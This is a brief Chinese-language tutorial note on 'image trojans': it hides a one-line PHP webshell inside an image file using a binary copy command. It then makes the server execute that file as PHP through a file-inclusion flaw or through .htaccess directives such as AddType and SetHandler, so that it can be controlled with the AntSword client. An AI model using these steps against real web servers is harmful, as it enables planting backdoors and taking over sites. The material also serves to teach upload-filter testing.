图片马:就是在图片中隐藏一句话木马。利用.htaccess等解析图片为PHP或者asp文件。达到执行图片内代码目的。
制作方法
- 文本方式打开,末尾粘贴一句话木马
- cmd中 copy 1.jpg/b+2.php 3.jpg
- /b是二进制形式打开
- /a是ascii方式打开
注意
- 单纯的图片马并不能直接和蚁剑连接,
- 因为该文件依然是以image格式进行解析,
- 只有利用文件包含漏洞,才能成功利用该木马
- 所谓文件包含漏洞,是指在代码中引入其他文件作为php文件执行时,未对文件进行严格过滤,导致用户指定任意文件,都作为php文件解析执行。
.htaccess解析
通过.htaccess文件,可以将特定文件扩展名映射为PHP文件进行解析。这种方法常用于改变文件的MIME类型,使服务器将非PHP文件(如.jpg)当作PHP文件解析。
例如将.jpg文件解析为PHP
AddType application/x-httpd-php .jpg
or
<FilesMatch "s.gif">
SetHandler application/x-httpd-php #在当前目录下,如果匹配到s.gif文件,则被解析成PHP代码执行
AddHandler php5-script .gif #在当前目录下,如果匹配到s.gif文件,则被解析成PHP代码执行
</FilesMatch>
then 蚁剑直接连接即可
0